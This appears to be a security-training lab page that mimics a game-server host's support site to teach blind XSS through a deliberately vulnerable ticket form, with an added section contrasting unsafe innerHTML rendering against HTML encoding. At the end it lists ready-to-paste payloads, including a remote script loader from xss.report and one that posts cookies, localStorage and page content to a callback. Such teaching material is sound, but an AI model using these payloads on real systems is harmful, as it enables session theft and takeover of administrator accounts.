🔬 LAB 64 — Blind XSS: a replica of the ZAP-Hosting support page. Click Support in the nav to open the vulnerable ticket form.
SERVER INSTANT ONLINE · configure, pay, enjoy!

Server hosting with the new ZAP 2.5 — Unique, Elegant and Fast

How important is an intuitive, modern and mobile optimised web panel for managing your servers to you? It is just as important to us as fast, DDoS-protected and fail-safe game servers. You're just one button away from being thrilled. 🎉

DDoS-protected servers across 15+ locations
Instant setup — server online in under 60 seconds
FiveM, Minecraft, ARK, Rust and 100+ game servers
24/7 support via ticket & live chat


20247+ active servers · 13283 active lifetime servers · 125 orders yesterday · 25003 ♥ for ZAP
🔬 Lab 64 — Blind XSS via Support Ticket
Click Support ▼ in the nav (or the floating chat icon) to open the ticket form. Submit a payload → then visit the Admin Panel to trigger the XSS.
What is Blind XSS?
1. Submit payload in Name/Subject/Message — you see nothing fire here (it's blind).
2. Payload stored raw in DB without sanitisation.
3. Admin opens ticket → innerHTML renders payload → XSS fires in admin's browser.
4. Attacker gets callback with cookies, IP, DOM via xss.report.
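The defect in step 3 is the admin panel dropping stored ticket fields into innerHTML unencoded. The block below is an added example, not code from the lab page, showing that vulnerable rendering pattern beside an output-encoded one and a small regression check a template test can run. The ticket fields, `escapeHtml`, `renderTicketUnsafe`, `renderTicketSafe` and `leaksRawMarkup` are all assumed names; the stored ticket is constructed here, using the lab's "Basic alert" payload as its message.

```javascript
// Added example (not the lab's own code). All names below are assumptions.

// Constructed ticket, as the admin panel would load it from the database.
// The message field is the lab's "Basic alert" payload, stored raw (step 2).
const storedTicket = {
  id: 0,
  name: "Bob",
  subject: "Cannot connect to my server",
  message: "<img src=x onerror=alert(document.domain)>",
};

// VULNERABLE pattern: raw stored values are interpolated into markup that the
// admin page later assigns to innerHTML, so user text becomes live HTML (step 3).
function renderTicketUnsafe(t) {
  return `<div class="ticket"><h2>${t.subject}</h2>` +
    `<p>From: ${t.name}</p><p>${t.message}</p></div>`;
}

// HARDENED pattern: encode the five HTML-significant characters before any
// user-controlled value enters markup. "<" can no longer open a tag and
// quotes can no longer break out of an attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderTicketSafe(t) {
  return `<div class="ticket"><h2>${escapeHtml(t.subject)}</h2>` +
    `<p>From: ${escapeHtml(t.name)}</p><p>${escapeHtml(t.message)}</p></div>`;
}

// Regression check for the admin panel's template tests: returns true when any
// user-controlled field that contains angle brackets appears verbatim (i.e.
// unencoded) in the rendered HTML.
function leaksRawMarkup(html, t) {
  return ["name", "subject", "message"].some(
    (field) => /[<>]/.test(t[field]) && html.includes(t[field]),
  );
}

// Stand-alone demonstration.
console.log("unsafe leaks markup:", leaksRawMarkup(renderTicketUnsafe(storedTicket), storedTicket)); // true
console.log("safe leaks markup:  ", leaksRawMarkup(renderTicketSafe(storedTicket), storedTicket));   // false
```

In the real admin page the simplest fix is to assign user text with `element.textContent` instead of `innerHTML`, which needs no encoding at all; the encoded template above is for code that must build an HTML string. Independently of encoding, a Content-Security-Policy that does not allow scripts from arbitrary hosts would keep the remote `script/src=//xss.report/...` loader in the second payload from executing even where an encoding step was missed.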
Try These Payloads
Paste into the ticket form fields:
Basic alert:
<img src=x onerror=alert(document.domain)>
From the real report:
direct';"></textarea></script><script/src=//xss.report/c/rix4uni></script>
Data exfiltration:
<img src=x onerror="fetch('64.php?action=xss_callback',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({ticket_id:0,uri:location.href,cookies:document.cookie,referrer:document.referrer,user_agent:navigator.userAgent,origin:location.origin,local_storage:JSON.stringify(localStorage),dom:document.documentElement.outerHTML.substring(0,500)})})">
Create ticket via mail — average response time: 14 minute(s)